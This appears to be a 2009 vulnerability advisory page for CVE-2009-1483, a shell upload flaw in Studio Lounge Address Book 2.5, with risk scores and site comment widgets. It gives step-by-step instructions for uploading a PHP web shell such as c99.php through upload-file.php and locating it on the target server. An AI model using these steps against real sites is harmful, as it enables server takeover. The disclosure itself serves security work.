Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability

2009.05.02

Credit: sys-project

Risk: High

Local: No

Remote: Yes

CVE: CVE-2009-1483

CWE: CWE-287

CVSS Base Score: 6.8/10

Impact Subscore: 6.4/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

Address Book 2.5 (profile) Remote Shell Upload Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/
- download: http://www.studiolounge.net/2007/08/17/address-book-25
- vuln file: upload-file.php
The upload-file.php doesn't check the type of archive
and you can uploaded the phpshell on the server.
~ [EXPLOITING]
1) /index2.php?title=add (upload your shell, ex: c99.php)
2) you should go to your "View Full Information" (ex: index2.php?title=fullview&id=150)
3) you view source code and search "profiles/imagethumb.php?s=" (ex: profiles/imagethumb.php?
s=57b7b72739c79f02d990c4239c4169b9.php)
4) view shell: http://target/profiles/57b7b72739c79f02d990c4239c4169b9.php
__h0__

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.